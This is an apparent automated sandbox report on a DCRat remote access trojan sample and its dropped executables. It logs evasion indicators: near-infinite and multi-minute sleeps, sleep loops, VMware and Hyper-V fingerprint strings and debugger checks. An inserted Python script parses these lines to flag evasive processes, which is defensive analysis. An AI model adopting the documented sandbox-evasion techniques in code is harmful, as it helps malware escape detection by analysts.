            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 599611
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 599482
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 599374
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 599265
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 599138
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 598131
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 598000
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 597890
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 597781
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 597671
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 597562
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 597453
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 597343
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 597233
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 597124
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 597015
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 596905
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 596796
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 596687
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 596532
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 596406
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 596293
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 596182
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 596031
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 595915
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 595811
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 595694
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 595578
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 595229
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 595124
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 595015
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 594905
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 594796
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 594687
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 594576
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 594468
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 594359
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 594249
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Thread delayed: delay time: 594113
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files\7-Zip\Lang\System.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Program Files\7-Zip\Lang\System.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Window / User API: threadDelayed 423
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Window / User API: threadDelayed 1563
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Window / User API: threadDelayed 3264
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe | Window / User API: threadDelayed 6476
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe | Window / User API: threadDelayed 363
            Source: C:\Program Files\7-Zip\Lang\System.exe | Window / User API: threadDelayed 366
            Source: C:\Program Files\7-Zip\Lang\System.exe | Window / User API: threadDelayed 365
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Evasive API call chain: GetLocalTime,DecisionNodes (graph_0-23008)
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe TID: 3152 | Thread sleep count: 423 > 30
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe TID: 3152 | Thread sleep count: 1563 > 30
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe TID: 6528 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -23058430092136925s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -3600000s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -3599890s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -600000s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -599874s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -599765s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -599611s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -599482s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -599374s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -599265s >= -30000s
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -599138s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -598131s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -598000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597890s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597781s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597671s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597562s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597453s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597343s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597233s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597124s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -597015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596905s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596796s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596687s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596532s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596293s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596182s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -596031s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595915s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595811s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595694s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595578s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595229s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595124s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -595015s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594905s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594796s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594687s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594576s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594468s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594359s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594249s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008Thread sleep time: -594113s >= -30000sJump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe TID: 7728Thread sleep count: 363 > 30
            Source: C:\Users\Default\Videos\dfVXJbANbh.exe TID: 7584Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\7-Zip\Lang\System.exe TID: 7756Thread sleep count: 366 > 30
            Source: C:\Program Files\7-Zip\Lang\System.exe TID: 7652Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Program Files\7-Zip\Lang\System.exe TID: 7664Thread sleep count: 365 > 30
            Source: C:\Program Files\7-Zip\Lang\System.exe TID: 7528Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\7-Zip\Lang\System.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Program Files\7-Zip\Lang\System.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D6A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00D6A5F4
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00D7B8E0
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D8AAA8 FindFirstFileExA,0_2_00D8AAA8
            Source: C:\Users\user\Desktop\DCRatBuild.exeCode function: 0_2_00D7DD72 VirtualQuery,GetSystemInfo,0_2_00D7DD72
            Source: C:\ChainBlocksurrogateagentFont\portperf.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 3600000Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 3599890Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599874Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599765Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599611Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599482Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599374Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599265Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 599138Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 598131Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 598000Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597890Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597781Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597671Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597562Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597453Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597343Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597233Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597124Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 597015Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596905Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596796Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596687Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596532Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596293Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596182Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 596031Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595915Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595811Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595694Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595578Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595229Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595124Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 595015Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594905Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594796Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594687Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594576Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594468Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594359Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594249Jump to behavior
            Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exeThread delayed: delay time: 594113Jump to behavior
            Source: C:\Users\Default\Videos\dfVXJbANbh.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\7-Zip\Lang\System.exeThread delayed: delay time: 922337203685477
            Source: C:\Program Files\7-Zip\Lang\System.exeThread delayed: delay time: 922337203685477
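            The delay values above deserve a second look. 922337203685477 is Int64.MaxValue divided by 10,000, which is TimeSpan.MaxValue expressed in milliseconds (a .NET tick is 100 ns), so these threads are parked with an effectively infinite timeout; the 3600000 and roughly 600000 ms values are one-hour and ten-minute delays; and the loop counts (363 to 1563) are far past the 30-call bar the sandbox applies. The Python below is an added example, not part of the report: it parses sleep evidence lines written in a constructed plain-text form of the entries above (process path, optional thread id, a pipe, then the observation), classifies each process's longest delay and largest loop count, and flags processes that cross the same three-minute and 30-call thresholds this report names. The sample lines mirror the values shown here plus one made-up benign.exe entry as a control.

```python
import re
from collections import defaultdict

# A .NET tick is 100 ns, so TimeSpan.MaxValue is Int64.MaxValue ticks; in
# milliseconds that is Int64.MaxValue // 10_000, the figure the report shows
# for the "infinite" delays.
TICKS_PER_MS = 10_000
INT64_MAX = 2**63 - 1
TIMESPAN_MAX_MS = INT64_MAX // TICKS_PER_MS      # 922337203685477

LONG_SLEEP_MS = 3 * 60 * 1000   # the report's "long sleeps (>= 3 min)" bar
LOOP_COUNT = 30                 # the report's "sleep count > 30" bar

# Constructed evidence lines (process path, optional thread id, a pipe, then
# the observation). Values mirror the report; benign.exe is a made-up control
# that sleeps for one second.
SAMPLE_LINES = [
    r"Source: C:\ChainBlocksurrogateagentFont\portperf.exe TID: 3152 | Thread sleep count: 423 > 30",
    r"Source: C:\ChainBlocksurrogateagentFont\portperf.exe TID: 6528 | Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -3600000s >= -30000s",
    r"Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\dfVXJbANbh.exe TID: 8008 | Thread sleep time: -599874s >= -30000s",
    r"Source: C:\Program Files\7-Zip\Lang\System.exe | Thread delayed: delay time: 922337203685477",
    r"Source: C:\Users\user\Desktop\benign.exe TID: 100 | Thread sleep time: -1000s >= -30000s",
]

LINE_RE = re.compile(
    r"Source:\s+(?P<proc>.+?\.exe)(?:\s+TID:\s+(?P<tid>\d+))?\s*\|\s*Thread "
    r"(?:sleep time: -?(?P<sleep_ms>\d+)s|sleep count: (?P<count>\d+)|delayed: delay time: (?P<delay_ms>\d+))"
)

def parse_line(line):
    """Return {'proc', 'kind', 'value'} for a sleep evidence line, or None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    proc = m.group("proc").rsplit("\\", 1)[-1]
    if m.group("count"):
        return {"proc": proc, "kind": "count", "value": int(m.group("count"))}
    ms = int(m.group("sleep_ms") or m.group("delay_ms"))
    return {"proc": proc, "kind": "sleep_ms", "value": ms}

def classify_delay(ms):
    """'infinite' for TimeSpan.MaxValue, 'long' past the 3-minute bar, else 'short'."""
    if ms >= TIMESPAN_MAX_MS:
        return "infinite"
    if ms >= LONG_SLEEP_MS:
        return "long"
    return "short"

def summarize(lines):
    """Per process: longest delay, its class, largest loop count, evasive flag."""
    per = defaultdict(lambda: {"max_sleep_ms": 0, "max_count": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        entry = per[rec["proc"]]
        key = "max_count" if rec["kind"] == "count" else "max_sleep_ms"
        entry[key] = max(entry[key], rec["value"])
    for entry in per.values():
        entry["delay_class"] = classify_delay(entry["max_sleep_ms"])
        entry["evasive"] = entry["delay_class"] != "short" or entry["max_count"] > LOOP_COUNT
    return dict(per)

if __name__ == "__main__":
    for proc, entry in summarize(SAMPLE_LINES).items():
        print(proc, entry)
```

            A process is flagged on either signal alone: one infinite or multi-minute sleep is enough, and so is a tight loop of short sleeps, which is how the 423- and 1563-iteration loops in portperf.exe would still be caught if each iteration slept for under three minutes.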
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user\AppData
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user\AppData\Local
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user\Documents\desktop.ini
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user\Desktop\desktop.ini
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | File opened: C:\Users\user\AppData\Local\Temp
            Source: wscript.exe, 00000002.00000003.2186669281.000000000336D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: portperf.exe, 00000006.00000002.2229539547.000000001B9DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: DCRatBuild.exe, dfVXJbANbh.exe4.6.dr, dfVXJbANbh.exe5.6.dr, dfVXJbANbh.exe3.6.dr, dfVXJbANbh.exe2.6.dr, dfVXJbANbh.exe.6.dr, dfVXJbANbh.exe0.6.dr, RuntimeBroker.exe.6.dr, dfVXJbANbh.exe1.6.dr, portperf.exe.0.dr, System.exe.6.dr | Binary or memory string: DyanhGfst51QiCfKYHj
            Source: wscript.exe, 00000002.00000003.2186669281.000000000336D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\(
            Source: portperf.exe, 00000006.00000002.2229539547.000000001B9DA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: a-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: w32tm.exe, 00000029.00000002.2273043211.0000019E84C17000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: dfVXJbANbh.exe, 00000014.00000002.3406569618.000000001B590000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlloo
            Source: C:\Users\user\Desktop\DCRatBuild.exe | API call chain: ExitProcess graph end node graph_0-23351
            Source: C:\ChainBlocksurrogateagentFont\portperf.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D8866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\DCRatBuild.exe | Code function: 0_2_00D8753D mov eax, dword ptr fs:[00000030h]
